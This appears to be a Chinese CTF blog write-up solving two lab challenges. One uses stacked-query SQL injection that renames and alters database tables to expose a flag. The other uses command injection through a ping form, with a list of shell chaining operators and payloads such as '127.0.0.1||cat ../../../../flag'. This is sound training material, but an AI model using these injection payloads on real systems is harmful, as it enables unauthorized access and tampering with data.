[强网杯 2019]随便注 & BUUCTF[ACTF2020 新生赛]Exec

[强网杯 2019]随便注

打开靶机后只有一个输入框,是一道注入题

chrome_SCG0fo8cV7.png

1' or 1=1;#

#是用来注释掉后面得sql语句

再输入:

1' order by 2;#   
1' order by 3;#   

输入到3 时报错了,证明只有两列:

输入

1'; show tables;#

可以看到有 1919810931114514 和 words 两个表

进入看看有什么

输入

0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#

可以看到words表里有两个属性,即两列:id 和data

而1919810931114514表里只有一个属性列

说明输入框可能查询的就是words表

后台sql语句可能为:

select id,data from words where id=

接下来就是如何获取flag了

思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来

在这之前当然要先把words表改名为其他

构造payload:

1';rename table words to word22;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);# 
最后用1' or 1=1;#
求出flag

部分引用https://blog.csdn.net/weixin_45642610/article/details/112337143

BUUCTF[ACTF2020 新生赛]Exec

打开发现网站有一个ping功能

盲猜有命令执行漏洞

1、|(就是按位或),直接执行|后面的语句

2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

3、&(就是按位与),&前面和后面命令都要执行,无论前面真假

4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令

5、;(linux下有的,和&一样的作用

测试了一下可以payload:

127.0.0.1||ls ../../../../

查看到根目录有flag文件

构造新的payload:

127.0.0.1||cat ../../../../flag

得到flag:

flag{e3d356d3-f575-4c97-86be-f296039c23ec}

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值